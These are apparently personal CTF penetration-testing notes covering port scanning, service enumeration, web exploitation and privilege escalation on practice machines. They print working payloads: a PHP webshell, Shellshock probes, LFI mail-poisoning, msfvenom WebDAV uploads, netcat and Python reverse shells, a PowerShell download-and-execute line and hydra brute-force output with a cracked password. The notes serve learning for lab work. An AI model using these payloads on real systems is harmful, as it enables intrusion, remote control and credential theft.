
Malrawr's Penetration Testing Workflow (CTF)

These notes are currently a work in progress. The goal is to create a complete workflow sheet using all my notes. It may be a little messy at first but I plan to organize it as time goes on.

`7MMM.     ,MMF'      db      `7MMF'      `7MM"""Mq.        db `7MMF'     A     `7MF'`7MM"""Mq.  
  MMMb    dPMM       ;MM:       MM          MM   `MM.      ;MM:  `MA     ,MA     ,V    MM   `MM. 
  M YM   ,M MM      ,V^MM.      MM          MM   ,M9      ,V^MM.  VM:   ,VVM:   ,V     MM   ,M9  
  M  Mb  M' MM     ,M  `MM      MM          MMmmdM9      ,M  `MM   MM.  M' MM.  M'     MMmmdM9   
  M  YM.P'  MM     AbmmmqMA     MM      ,   MM  YM.      AbmmmqMA  `MM A'  `MM A'      MM  YM.   
  M  `YM'   MM    A'     VML    MM     ,M   MM   `Mb.   A'     VML  :MM;    :MM;       MM   `Mb. 
.JML. `'  .JMML..AMA.   .AMMA..JMMmmmmMMM .JMML. .JMM..AMA.   .AMMA. VF      VF      .JMML. .JMM.

Initial Scan

Save time and do a full port scan of the machine. This gives you a complete overview of the target. It's easy to miss something with the default scan (which only covers the 1000 most common TCP ports), especially in a CTF, which is more puzzle-like. A TCP scan is usually all you need in a CTF, but it is sometimes worth doing a UDP scan as well.

NMAP

For an in-depth TCP nmap scan you can do something along the lines of: nmap -sC -sV -p- $IP_ADDRESS

The -p- flag tells nmap to scan all 65535 TCP ports instead of the default top 1000. -sC runs the default NSE scripts and -sV probes each open port for the service and version.

For a UDP scan it's generally better not to scan every port, because UDP scanning is slow (open ports usually don't answer, so nmap has to wait for timeouts): nmap -sC -sV -sU -T4 --top-ports 20 $IP_ADDRESS

--top-ports requires a number (it scans that many of the most common ports); 20 is a reasonable start. The -T4 flag selects a more aggressive timing template and speeds up the scan.

Using nmap NSE scripts you can also check for known vulnerabilities: nmap --script "*vuln*" --script-args=unsafe=1 -p $PORTS $IP_ADDRESS

Quote the wildcard so the shell doesn't expand it. Use this scan with caution: unsafe=1 lets the scripts run intrusive checks that can crash weak services, so generally you shouldn't go all out with it.

Quickfire

One of the downsides of a full port scan is the amount of time it takes. To remedy this I've created a wrapper that combines masscan and nmap (https://gitlab.com/malrawr/quickfire). This is much faster than relying on nmap alone. Additionally it can use amap to give you more information about each open port that you are dealing with.

Port Enumeration

Always check everything closely and go through each port one by one. Sometimes ports are tricky, especially HTTP servers on non-standard ports. One way to check a port you're unsure about is curl. curl is normally used for HTTP, but you can point it at any port and see how the service responds, which makes it quick to find those odd HTTP ports.

`curl $IP_ADDRESS:$PORT`

Another tool to use is amap, which sends protocol triggers to a port and generally gives more detailed information about what is listening. Note that the target and the port are separate arguments:

amap $IP_ADDRESS $PORT

Search for everything you encounter, such as programs and their version numbers. Use either searchsploit or a google dork with site:exploit-db.com/exploits/

Using google dorks instead of searching manually through the exploit-db website lets you avoid the website's captcha.

When you search for an application's version number, also test the exploits listed for older versions; an advisory often lists only the version it was tested on, and other versions can be susceptible to the same vulnerability.

One last important thing to remember is to take advantage of nmap NSE scripts. If you find a port that you believe may be vulnerable to something, check whether there's an NSE script for it. You can find them with updatedb and locate '*.nse' (on Kali they live in /usr/share/nmap/scripts).

Enumerating Ports with Metasploit

You can use Metasploit to search for auxiliary, exploit, and payload modules with the search command. A plain keyword search matches the words anywhere in a module's description, so "search port 22" returns far more than SSH modules (as the output below shows); narrow it down with filters such as type:auxiliary or name:ssh when needed.

msf > search port 22

Matching Modules
================

   Name                                                                  Disclosure Date  Rank       Description
   ----                                                                  ---------------  ----       -----------
   auxiliary/admin/2wire/xslt_password_reset                             2007-08-15       normal     2Wire Cross-Site Request Forgery Password Reset Vulnerability
   auxiliary/admin/android/google_play_store_uxss_xframe_rce                              normal     Android Browser RCE Through Google Play Store XFO
   auxiliary/admin/atg/atg_client                                                         normal     Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   auxiliary/admin/hp/hp_imc_som_create_account                          2013-10-08       normal     HP Intelligent Management SOM Account Creation
   auxiliary/admin/http/allegro_rompager_auth_bypass                     2014-12-17       normal     Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
   auxiliary/admin/http/hp_web_jetadmin_exec                             2004-04-27       normal     HP Web JetAdmin 6.5 Server Arbitrary Command Execution
   auxiliary/admin/http/kaseya_master_admin                              2015-09-23       normal     Kaseya VSA Master Administrator Account Creation
   auxiliary/admin/http/limesurvey_file_download                         2015-10-12       normal     Limesurvey Unauthenticated File Download
   auxiliary/admin/http/manageengine_dir_listing                         2015-01-28       normal     ManageEngine Multiple Products Arbitrary Directory Listing
   auxiliary/admin/http/manageengine_file_download                       2015-01-28       normal     ManageEngine Multiple Products Arbitrary File Download


FTP - 21

The first thing to check on an FTP server is anonymous login (user anonymous, any password). If it works, what can you do with it? Enumerate every file you can reach.

Whenever you have anonymous access, always enumerate the files; you may find passwords or system information. Also test whether you can upload, and if you can, whether you can reach the uploaded file through another service and execute it.

  • Does the FTP server have a wwwroot directory? Is it possible to upload files into this directory?
  • Does the FTP server have arbitrary file access? What information can you find?
    • What is the OS version?
    • What information can you find about other services?
    • Can you find any passwords?

Nmap has a number of NSE scripts that may be helpful for enumerating FTP (ftp-anon checks anonymous login; note that the wildcard also pulls in ftp-brute): nmap --script "ftp*" -p 21 $IP_ADDRESS

Open OS Filesystem

Sometimes FTP is misconfigured to the point where you can browse the entire filesystem of the machine. The following files identify the OS and its version:

  • Windows
    • Windows XP
      • C:\Windows\System32\eula.txt
    • Windows 7
      • C:\Windows\System32\license.rtf
  • Linux
    • cat /etc/lsb-release
    • cat /etc/issue.net
    • Debian
      • cat /etc/debian_version
    • Red Hat
      • cat /etc/redhat-release

SSH - 22

It's uncommon to find an exploitable vulnerability in SSH itself. Usually the only way in is with credentials: a user and password you found elsewhere, or brute force with hydra against a known username.

A good way to check whether a user exists on the box is SMTP's VRFY command. If the user exists and you found a password somewhere, that could be your ticket in.

SMTP - 25

Use SMTP to verify that a user exists. For example, if you find a username while enumerating another application, you can check that the user exists on the system with VRFY. If the user exists, try logging in over SSH as that user with a password from the other application.

DNS - 53

  • When you see DNS open it is a hint that the target relies on hostnames, i.e. virtual hosts. A common sign is that visiting the bare IP address serves only a default index page; the real site is only served when the request carries the right Host header.
    • Basically look out for virtual hosts
      • curl -H 'Host: virtualhost.host' http://127.0.0.1/
        • Can also add the host to your /etc/hosts file
    • You can also use nslookup against the target's own DNS server to map things out. A reverse lookup on the IP shows the hostname/zone name, and a forward lookup on a hostname shows whether it maps to an IP address:

      nslookup
      > server $IP_ADDRESS
      > $IP_ADDRESS
      > $VIRTUAL_HOST_NAME

  • DNS Zone Transfer Records
    • A zone transfer (AXFR) gives you every record in the zone. Transfers run over TCP 53, so if that port is open it's worth trying, but it only succeeds when the server is misconfigured to allow transfers to anyone.
    • dig axfr @<IP ADDRESS> <ZONE NAME> ---- Note: the zone name is what you found with nslookup
      • This shows the subdomains defined in the zone; add them to your /etc/hosts file so that you can visit them easily without modifying the Host header in Burp
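The step above (transfer the zone, then add every name to /etc/hosts) can be scripted. The block below is an added example and not part of the original notes: it parses the answer lines of dig axfr into name/address pairs, resolves CNAMEs that point at names in the same transfer, and prints one /etc/hosts line per address. The dig output embedded in it is constructed for the example; target.htb and the 10.10.10.x addresses are placeholders, and the parsing follows dig's standard "name ttl class type rdata" line format.

```python
"""Turn `dig axfr` output into /etc/hosts lines.

Added example, not from the original notes. The AXFR output below is constructed
for the example; target.htb and 10.10.10.x are placeholders. Parsing follows
dig's 'name ttl class type rdata' answer lines.
"""
import subprocess

# Constructed sample of what dig prints for a successful AXFR.
SAMPLE_AXFR = """\
; <<>> DiG 9.11.5 <<>> axfr @10.10.10.10 target.htb
;; global options: +cmd
target.htb.             604800  IN      SOA     ns1.target.htb. admin.target.htb. 3 604800 86400 2419200 604800
target.htb.             604800  IN      NS      ns1.target.htb.
target.htb.             604800  IN      A       10.10.10.10
ns1.target.htb.         604800  IN      A       10.10.10.10
dev.target.htb.         604800  IN      A       10.10.10.11
www.target.htb.         604800  IN      CNAME   target.htb.
target.htb.             604800  IN      SOA     ns1.target.htb. admin.target.htb. 3 604800 86400 2419200 604800
;; Query time: 3 msec
"""


def parse_axfr(text):
    """Return {name: ip} for A records; a CNAME whose target is in the same
    transfer is resolved to that target's address."""
    a_records, cnames = {}, {}
    for line in text.splitlines():
        if not line or line.startswith(";"):      # comments and blank lines
            continue
        fields = line.split()
        if len(fields) < 5 or fields[2] != "IN":  # not an answer line
            continue
        name = fields[0].rstrip(".")
        rtype = fields[3]
        rdata = fields[4].rstrip(".")
        if rtype == "A":
            a_records[name] = rdata
        elif rtype == "CNAME":
            cnames[name] = rdata
    for alias, target in cnames.items():
        if target in a_records:
            a_records[alias] = a_records[target]
    return a_records


def hosts_lines(records):
    """One /etc/hosts line per address, names sorted so the output is stable."""
    by_ip = {}
    for name, ip in records.items():
        by_ip.setdefault(ip, []).append(name)
    return ["%s %s" % (ip, " ".join(sorted(names))) for ip, names in sorted(by_ip.items())]


def run_axfr(server, zone):
    """Live version: ask the target's own name server for the zone (needs dig)."""
    result = subprocess.run(["dig", "axfr", "@" + server, zone],
                            capture_output=True, text=True, check=False)
    return hosts_lines(parse_axfr(result.stdout))


if __name__ == "__main__":
    import sys
    for line in run_axfr(sys.argv[1], sys.argv[2]):   # e.g. 10.10.10.10 target.htb
        print(line)                                     # append these to /etc/hosts
```

Run it as python3 axfr_hosts.py $IP_ADDRESS $ZONE_NAME and append the printed lines to /etc/hosts; if the transfer is refused, dig prints "Transfer failed." and nothing is parsed.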

HTTP/HTTPS - 80/443 & Other Ports

When visiting websites it's important to find as much information as you can. Poke around manually; don't rely on an automated scanner like nikto to find things for you.

Questions to Ask

  • Does the source mention anything about a program? Does the source contain any version numbers?
  • What language is the server running? PHP? ASP? Etc.
    • This is important for uploading or knowing vulnerabilities
      • For example, say you found a host running FTP and HTTP servers and discover that you can upload through FTP and access the file through HTTP. For the server to execute that file it has to be in a language the web server handles (PHP on Apache, ASP/ASPX on IIS) and be readable by the web server's user.
  • What filetypes does the server allow for uploading?
    • Perhaps you can take advantage of this by generating a payload in a specific format. msfvenom --help-formats lists what is available:

      Executable formats
        asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
      Transform formats
        bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript
  • Is there a login page?
    • Have you tried using default credentials?
    • Have you tried using google to find default credentials for the application and version?

      It's a good idea to create a custom wordlist with default credentials, so that you can use hydra to automate it while you poke around. I talk more about this in the hydra section below.

  • Does the web application have an admin console? Can you exploit it?
  • Does the web application allow uploading?
    • It allows uploading but it won't accept my file type?
      • Check whether it stores the file anyway, for example in a temp folder
      • Is there a way to bypass the file check?
      • Can you upload a malicious file in a type it does accept?
      • I uploaded my file but I don't know how to access it?
        • Did you try seeing if you could traverse directories?
        • Perhaps you can use an LFI to include the file
  • Does the website use WebDAV?
    • Can you upload into it?
    • Try cadaver

      Check the WebDAV section for more information

Visit Website

  • When checking a new site in Burp Suite try changing the 'Host' header. Instead of the IP, set it to the domain name of the server. This is for virtual host routing: the server looks at the header and serves a different site if one is configured for that name.
  • Try using curl on pages; the raw response may contain things that are not obvious in 'view source' in Firefox

Gather Info

  • whatweb http://127.0.0.1/index.html
    • It gives you a general idea of the underlying technologies running on a website

Directory Brute Force

  • dirb http://127.0.0.1 -r -o tmp.dirb
    • -r - don't search recursively
    • -o - output to file
  • dirbuster
    • Use multiple wordlists:
      • /usr/share/dirb/wordlists/common.txt
      • /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
      • /usr/share/wfuzz/wordlist/general/megabeast.txt
    • Use common extensions
      • /usr/share/wfuzz/wordlist/general/extensions_common.txt
    • Use the tabs to sort results by response code

Uploading Stuff to Web Applications

  • Sometimes a specific file type is required; there are a few ways to bypass this:
    • Magic bytes
      • These are the first few bytes of a file that identify its type. Copy enough of a valid file (the signature, or a whole small image) and put your malicious code after it. To check that it's properly disguised, run the file command on it and see what type it reports.
    • Double extension
      • Let's say it's looking for a PNG file: try something like evil.png.php. The .png part is there in case the site checks that the name contains an allowed extension, while the final .php is what the server uses to decide how to execute it.
        • You can do variations of this also (different order, upper-case extensions).

Uploading Web Shells

  • Simple webshell
    • <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>
      • Use the full <?php tag; the short <? form only works when short_open_tag is enabled on the server. Call it as shell.php?cmd=id
  • Microsoft IIS
    • Try both asp and aspx shells
      • Which one works mostly depends on the version of IIS that is running.

Wordpress

  • Scan with wpscan and check the admin pages to see what you can find
    • wpscan --url http://10.10.10.10/ --enumerate u or wpscan --url http://10.10.10.10/ --enumerate u --log
      • --enumerate u lists users; --log writes the output to a file
  • Wordlists To Use
    • /usr/share/seclists/Discovery/Web_Content/CMS/wordpress.fuzz.txt
    • /usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt
    • /usr/share/seclists/Discovery/Web_Content/CMS/wp_themes.fuzz.txt

Shellshock

  • If you find a random .sh file in a web directory (typically under cgi-bin) test it for Shellshock
    • curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://$IP/cgi-bin/user.sh
      • The echo commands produce a valid CGI response header, so the command output is sent back instead of a 500 error
  • CGI scripts (cgi-bin, .cgi) and programs such as Webmin are the usual Shellshock targets
    • In Burp change the User-Agent to:
      • User-Agent: () { :; }; echo hi
  • Servers react differently to Shellshock: Apache will return the output immediately, but Webmin may not show a response at all.
    • In that case use a time-based check such as () { :; }; sleep 10 and compare response times. If the server usually answers in 2 seconds but takes about 10 seconds longer with the sleep payload, chances are it's vulnerable.
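A scripted version of both checks above (look for a marker in the output first, then fall back to a timing check for servers such as Webmin that return nothing), as an added example that is not code from the original notes. The User-Agent format is the one used above; the URL comes from the command line, and the marker string and the timing margin (half the sleep) are assumptions.

```python
"""Shellshock probe for a CGI endpoint: output marker first, timing second.

Added example, not code from the original notes. The User-Agent format is the
one used in the notes; the URL comes from the command line and the marker
string and the timing margin (half the sleep) are assumptions.
"""
import sys
import time
import urllib.error
import urllib.request

MARKER = "shellshock-probe-ok"   # constructed string we expect to see echoed back


def shellshock_header(command):
    """The function-definition prefix makes a vulnerable bash run the trailing
    command while importing the environment variable the CGI layer sets."""
    return "() { :; }; " + command


def marker_command():
    """Emit a minimal CGI header first so the output comes back as a 200 body."""
    return "echo Content-Type: text/plain; echo; echo %s; /usr/bin/id" % MARKER


def looks_vulnerable_by_output(body):
    return MARKER in body


def looks_vulnerable_by_timing(baseline_seconds, probe_seconds, sleep_seconds):
    """Blind variant: a sleep only delays the reply if it actually ran. Half the
    sleep is used as the threshold to absorb normal jitter."""
    return probe_seconds - baseline_seconds >= sleep_seconds / 2.0


def timed_get(url, user_agent, timeout=30):
    """GET with a custom User-Agent; returns (seconds, body). Errors still count:
    an HTTP error body is kept, and a timeout is reported with an empty body."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        body = err.read().decode("utf-8", "replace")
    except OSError:                       # URLError, socket timeout, refused
        body = ""
    return time.monotonic() - start, body


def check(url, sleep_seconds=10):
    """Returns (vulnerable, reason) for a live target."""
    base_time, _ = timed_get(url, "Mozilla/5.0")
    _, body = timed_get(url, shellshock_header(marker_command()))
    if looks_vulnerable_by_output(body):
        return True, "marker echoed in response body"
    probe_time, _ = timed_get(url, shellshock_header("sleep %d" % sleep_seconds))
    if looks_vulnerable_by_timing(base_time, probe_time, sleep_seconds):
        return True, "response delayed by %.1fs" % (probe_time - base_time)
    return False, "no marker and no delay"


if __name__ == "__main__":
    print(check(sys.argv[1]))   # e.g. http://10.10.10.10/cgi-bin/user.sh
```

The timing check keeps the request timeout well above the sleep, otherwise a vulnerable server that sleeps the full 10 seconds would be cut off and counted as a timeout rather than a delay.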

Directory Bruteforcing Tips

  • If you can narrow down a few directories of interest, try narrowing the bruteforcing. You can use a giant wordlist on just one directory in order to enumerate it well.

Proxies

  • When going through a proxy, experiment with the hostname the request is addressed to rather than just the IP, similar to DNS.
    • Look out for virtual hosts
      • curl -H 'Host: virtualhost.host' http://127.0.0.1/
        • Can also add the host to your /etc/hosts file

Attacking Login Pages

Whenever you're enumerating a webpage you should run sqlmap in the background while you poke around. At the same time you can also use

SQLMAP
  • Capture the POST request of the login screen with Burp and paste it into a new file
  • Use one of the following commands; you can press enter to accept the defaults whenever it prompts
    • sqlmap -r login.req
    • sqlmap -r login.req --level 5 --risk 3 (more thorough and slower; --risk 3 adds OR-based tests that can modify data if the injection lands in an UPDATE or DELETE)
Hydra

Bruteforce all login pages that you see. You could type entries manually and reload, but it's faster to let Hydra run while you do other stuff.

Hydra flags used in the example, from the man page:
  • -f    exit when a login/pass pair is found
  • -l    login with LOGIN name (to try an empty username use -l "")
  • -P    load several passwords from FILE

  1. When bruteforcing pages you need to specify the module used. In this example it is http-post-form.

    There's a difference between http-post-form and https-post-form. Make sure you use the one appropriate to the protocol.

  2. Use Burp to capture a POST request to the login page.
  3. Put in the path and POST body from Burp, replacing the user and password values with ^USER^ and ^PASS^.
  4. After that, append a string that appears on the page when a login fails; in this case the phrase "is incorrect" appears. The three parts are separated by colons: path:body:failure-string.
```
root@kali:~/tmp/htb/apocalyst# hydra -f -l falaraki -P list.txt apocalyst.htb http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:is incorrect"
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-31 00:58:03
[DATA] max 16 tasks per 1 server, overall 16 tasks, 486 login tries (l:1/p:486), ~31 tries per task
[DATA] attacking http-post-form://apocalyst.htb:80//wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1:is incorrect
[80][http-post-form] host: apocalyst.htb   login: falaraki   password: Transclisiation
[STATUS] attack finished for apocalyst.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-31 00:58:38
```

The example above is from a retired HTB machine named Apocalyst
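Building the http-post-form argument by hand is where most mistakes happen (a wrong placeholder, an unescaped colon, http instead of https). The script below, an added example that is not part of the original notes, does steps 2 to 4 from a captured request: it takes the raw POST saved from Burp, swaps the user and password fields for ^USER^ and ^PASS^, re-encodes the remaining fields, appends the failure string and assembles the hydra command line. The sample request is a constructed copy of the wp-login.php request above; the field names (log, pwd) and the wordlist name are assumptions.

```python
"""Turn a captured login POST into a hydra http-post-form argument.

Added example, not part of the original notes. It assumes the request was
saved as raw text (Burp's 'Copy to file'); the sample request below is a
constructed copy of the wp-login.php request from the Apocalyst example.
"""
import shlex
from urllib.parse import parse_qsl, quote_plus

# Constructed sample, modelled on the wp-login.php request above.
SAMPLE_REQUEST = """POST /wp-login.php HTTP/1.1
Host: apocalyst.htb
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded

log=falaraki&pwd=test123&wp-submit=Log+In&redirect_to=http%3A%2F%2Fapocalyst.htb%2Fwp-admin%2F&testcookie=1
"""


def parse_request(raw):
    """Return (host, path, body) from a raw HTTP request dump."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split()
    if method.upper() != "POST":
        raise ValueError("expected a POST request, got %s" % method)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers["host"], path, body.strip()


def hydra_form_spec(raw, user_field, pass_field, failure_string):
    """Build hydra's 'path:body:failure-string' with ^USER^/^PASS^ placeholders."""
    _host, path, body = parse_request(raw)
    parts = []
    for key, value in parse_qsl(body, keep_blank_values=True):
        if key == user_field:
            value = "^USER^"            # hydra substitutes the login here
        elif key == pass_field:
            value = "^PASS^"            # and each password candidate here
        else:
            value = quote_plus(value)   # re-encode the rest as the browser sent it
        parts.append("%s=%s" % (key, value))
    # hydra splits the spec on ':' so any literal colon left in the body must be escaped
    new_body = "&".join(parts).replace(":", "\\:")
    return "%s:%s:%s" % (path, new_body, failure_string)


def hydra_command(raw, user_field, pass_field, failure_string, login, wordlist, https=False):
    """Full argv for hydra; -f stops at the first valid pair."""
    host, _path, _body = parse_request(raw)
    module = "https-post-form" if https else "http-post-form"
    spec = hydra_form_spec(raw, user_field, pass_field, failure_string)
    return ["hydra", "-f", "-l", login, "-P", wordlist, host, module, spec]


if __name__ == "__main__":
    cmd = hydra_command(SAMPLE_REQUEST, "log", "pwd", "is incorrect", "falaraki", "list.txt")
    print(" ".join(shlex.quote(arg) for arg in cmd))
```

The printed command reproduces the one in the example above; the failure string is matched against the response body, so pick a phrase that only appears on a failed login, otherwise every attempt is reported as a hit.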

Default Passwords or Obvious Passwords
  • The username/password could be the name of the application or something else on the same page
    • The rationale is that it's something easily found on the page so that a lazy system administrator will remember it later.
      • You can use cewl to spider the site and build a wordlist from the words on it.
    • Use the cewl output as a custom wordlist and brute-force the page with it.

Local File Inclusion (LFI)

  • When you find an LFI-vulnerable page, look for configuration files with passwords in them and try every password you find against every service; a password that turns up in several places is the most likely to be reused.
  • Check /etc/fail2ban/fail2ban.conf and /etc/fail2ban/jail.conf
    • fail2ban bans an IP after repeated failed logins, which defeats Hydra and other brute-force tools. If it's installed, check which jails are enabled (ssh, apache, etc.) before brute-forcing a protected service; otherwise you'll have to try passwords manually and sparingly.
  • /proc/self/status
    • Shows the uid and gid the web server process runs as.
    • Look the UID up in /etc/passwd to see which user that is
  • /proc/self/environ
    • If the LFI can read this file, your request headers are in it (HTTP_USER_AGENT). Set your User-Agent to PHP code and include the file; the server will execute it.
  • ~/.ssh/id_rsa
    • Instant private key, if the web server's user can read the home directory
  • Poisoning Mail
    • If the LFI can read the mail spool (/var/mail/<user>), you can get code execution by mailing the target user a PHP one-liner and then including the spool file.
    • Connect to SMTP with telnet and wait for the mail server to respond with its banner, then send the following:

      EHLO hacker.htb
      VRFY target@localhost            <-- target is the user the web server runs as
      MAIL FROM: $SENDER_ADDRESS
      RCPT TO: target@localhost
      DATA
      Subject: whatever
      <?php echo system($_REQUEST['evil']); ?>
      .                                 <-- a line with a single dot ends the message

    • It should then say that the message is queued. Using the LFI, include the mail file and pass the command in the evil parameter: ../../../var/mail/target%00&evil=whoami
      • The %00 truncates anything the application appends to the path (such as .php); that trick only works on PHP versions before 5.3.4.
    • You should now have command execution.

WebDAV

First check how WebDAV behaves with the server version; uploading may require a certain trick.

  • For example, you generate a msfvenom reverse shell in asp format but save it as evil.txt, since .txt uploads are usually allowed while .asp uploads are refused.
  • After uploading it with curl -T evil.txt http://<IP ADDRESS>/ you use cadaver http://<IP ADDRESS>/ to copy (or move) the file from evil.txt to evil.asp;.txt.

On IIS 6.0 the server stops parsing the file name at the semicolon, so evil.asp;.txt is executed as ASP even though it was accepted as a text file.

An example of this process is below:

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=443 -f asp > evil.txt
curl -T evil.txt http://<IP ADDRESS>/
cadaver http://<IP ADDRESS>/
dav:/> copy evil.txt evil.asp;.txt
```

Then start your handler and execute the file by visiting it in the browser or with curl.

TFTP - 69U

Treat TFTP like you do FTP, keeping in mind that it has no authentication and no directory listing, so you need to know or guess file names. It's more common to find on Windows machines.

POP3 - 110

RPC - 111

SMB - 139/445

SMB generally leaks a lot of information. The quickest way to enumerate this service is enum4linux, which tries a null session and pulls users, shares, groups and the OS version:

enum4linux -a $IP_ADDRESS

Viewing Shares

If a share is found you can view and access it using smbclient.

View share names, share types, and comments (-N skips the password prompt for a null session): smbclient -N -L //$IP_ADDRESS

Accessing shares: smbclient -N '//$IP_ADDRESS/$SHARE_NAME'

Navigating through SMB shares is similar to FTP (ls, cd, get, put). They can also share similar vulnerabilities such as arbitrary file access or writable shares.

Common Exploits

Scanning for these vulnerabilities with nmap's smb-vuln scripts may crash the SMB service, so run them only when you accept that risk.

MS08-067

Check with: nmap --script smb-vuln-ms08-067.nse -p445 $IP_ADDRESS

MS17-010

Check with: nmap --script smb-vuln-ms17-010.nse -p445 $IP_ADDRESS

SNMP - 161

Simple Network Management Protocol (SNMP) is used for network management. When it is exposed with a guessable community string (often "public") it is possible to retrieve general system information such as hostname and OS version. You can also get open ports and connections (basically netstat output), running processes, network interfaces, and installed software with versions.

If you see this port open, first find a valid community string: onesixtyone -c $WORDLIST $IP_ADDRESS tries each string in the wordlist and prints the system description (OS info) for every one that works.

Then use snmp-check $IP_ADDRESS (-c to set the community string), which dumps everything about the server: OS version, users, processes, hotfixes, etc.

Alternatively, Metasploit has scanner/snmp auxiliary modules you can select from and enumerate with.

Privilege Escalation

Privilege escalation is the result of actions that allows an attacker to obtain a higher level of permissions on a victim's system or network.

Moving Files From Attacker to Victim

Use Python's SimpleHTTPServer module (http.server on Python 3) to serve files from your machine to the victim.

On Linux machines you can then use wget or curl to request the files. Alternatively use wget's -r (recursive) flag to download everything in that web folder at once.

On Windows you can use PowerShell. On PowerShell 3.0 and later wget is an alias for Invoke-WebRequest, so you can do something like: wget http://10.10.10.10:8080/evilfile.exe -OutFile evilfile.exe

Linux System

  • List commands that the user can run with sudo
    • sudo -l

```
$ sudo -l
Matching Defaults entries for www-data on webbox:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on webbox:
    (scriptworker : scriptworker) NOPASSWD: ALL
```

The line (scriptworker : scriptworker) NOPASSWD: ALL means www-data can run any command as the user scriptworker (and group scriptworker) without a password. So you can simply start a shell as that user with sudo -u scriptworker and work on anything scriptworker owns.

Linux Enumeration Scripts

Whenever you have user access inside a box, start off with one of the enumeration scripts below and examine the output afterwards. Generally I like working from the /dev/shm directory instead of /tmp so I store all my work there.

  • LinEnum.sh
    • It has the -t flag for thorough checks
  • linuxprivchecker.py
  • unixprivesc.sh
Resources
  • https://www.rebootuser.com/?p=1623

Using a Working Directory

  • /tmp or /var/tmp
    • A good directory for temporary work files
  • /dev/shm
    • Saves into ramdisk so that it doesn't get saved in the HDD
    • Whenever the server gets reboot everything is cleared

Spawn a TTY Shell

  • python -c 'import pty; pty.spawn("/bin/sh")' or python -c 'import pty; pty.spawn("/bin/bash")'
    • This gives a basic TTY, enough for programs such as su and ssh that refuse to run without one
  • https://github.com/infodox/python-pty-shells
    • A collection of shells that give full functionality, similar to an SSH session. The best ones to use are tcp_pty_backconnect.py on the target and tcp_pty_shell_handler.py as the handler.
    • One-liner TCP PTY backconnect (set lhost and lport to your listener)
      • python -c 'import os,pty,socket; lhost = "127.0.0.1"; lport = 31337; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE","/dev/null"); pty.spawn("/bin/bash"); s.close();'

Other Tips - Getting Advanced Terminal Control (Bash Completion, History, and Arrow Usage)

  • First get a Python PTY shell; the steps below need a real pty to work
    • python -c 'import pty; pty.spawn("/bin/bash")'
  • Background the shell with CTRL-Z
  • stty raw -echo
    • This tells your local terminal not to process special characters (CTRL-C, tab, arrow keys) itself but to pass them through to the foreground job, which is the reverse shell we're in.
  • Grab your local terminal type
    • root@kali:/# echo $TERM
    • xterm-256color
  • Bring the shell back to the foreground using fg
  • Now you can export your term variable in the reverse shell
    • export TERM=xterm-256color
  • After completing these steps you should have proper terminal control
  • A shorter version that usually suffices:
    • CTRL-Z
    • stty raw -echo
    • fg
    • Reset the terminal with reset
      • It'll prompt for the terminal type, so put in xterm-256color <--- the value of echo $TERM on Kali
    • Set the window size so that vim and other full-screen programs work properly
      • On your own terminal type: stty size
      • On the target machine type the numbers you received: stty rows ## cols ###

Most Reliable Reverse Shell from Pentest Monkey

  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Misc. Linux

Here are miscellaneous commands.

Finding Deleted Files

  • Sometimes you have to look through deleted files on a partition
    • grep -a '' /dev/sdb
      • This dumps every printable run of bytes on the device, deleted or not, so it's only practical for small USB sticks
    • On a larger partition grep for something specific instead
      • grep -a 'password' /dev/sdb

Windows System

Gaining Reverse Shells

  • Unicorn: https://github.com/trustedsec/unicorn
    • It sets up a quick Meterpreter session by generating PowerShell shellcode that you can paste into the target's console.
    • It helps to save the generated command as a .ps1 file and execute it remotely on the target instead of pasting it into the command line
    • python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 37337
    • msfconsole -r unicorn.rc

Windows File Transfers

  • powershell "IEX(New-Object Net.WebClient).downloadString('http://127.0.0.1:80/index.html')"
    • Tells PowerShell to go to a website and execute whatever is on that page.

Windows Enumeration with Meterpreter

sysinfo - meterpreter
  • Look at the OS and architecture
  • What version of Meterpreter are we running, 32 or 64 bit?
getuid - meterpreter
  • View current user
Using Post Modules
post/multi/recon/local_exploit_suggester
  • Looks at the KBs applied to the machine and the session's platform and architecture, then returns exploit suggestions
  • Note the version of Meterpreter we're running
    • 32-bit and 64-bit sessions return different suggestions
    • After it completes, migrate into a 64-bit process and run it again
